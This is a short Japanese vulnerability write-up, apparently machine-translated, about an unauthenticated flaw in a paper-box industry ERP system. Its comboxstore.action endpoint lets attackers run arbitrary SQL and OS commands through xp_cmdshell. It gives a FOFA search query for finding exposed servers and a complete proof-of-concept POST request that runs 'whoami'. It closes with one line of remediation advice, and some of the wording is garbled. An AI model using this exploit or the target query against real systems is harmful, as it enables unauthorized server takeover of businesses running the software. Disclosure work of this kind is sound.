0x01 製品紹介
啓王製造紙器業界の erp システムは、紙器業界の特性と業務プロセスを熟知した多数の IT 専門家によって構築されており、国際的に先進的な管理手法を備え、最新の管理手法を erp ソフトウェアに統合して、企業が次のことを行うことができます。数分で科学的管理の経験が得られます。erpの機能には、原価計算、見積・価格設定、受発注、製造発注、現場管理などさまざまな機能があります。
0x02 脆弱性の概要
ERP comboxstore.action インターフェイスの権限設定が不適切なため、デフォルト設定では任意の SQL ステートメントを実行でき、xp_cmdshell 関数を使用してリモートでコマンドを実行でき、認証されていない攻撃者がこの脆弱性を通じてサーバー権限を取得する可能性があります。
0x03 再発環境
FOFA: title="啓王製造 ERP システム"
0x04 脆弱性の再発
http://your-ip/mainFunctions/comboxstore.action
上記の状況では抜け穴があります
実証実験
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
comboxsql=exec%20xp_cmdshell%20'whoami'
SQL文の実行
利用 xp_cmdshell RCE
0x05 修復の提案
インターネットアクセス許可を解除し、このインターフェースに権限認証を設定します(内部アクセスのみ許可)
できるだけ早くパッチを当ててください!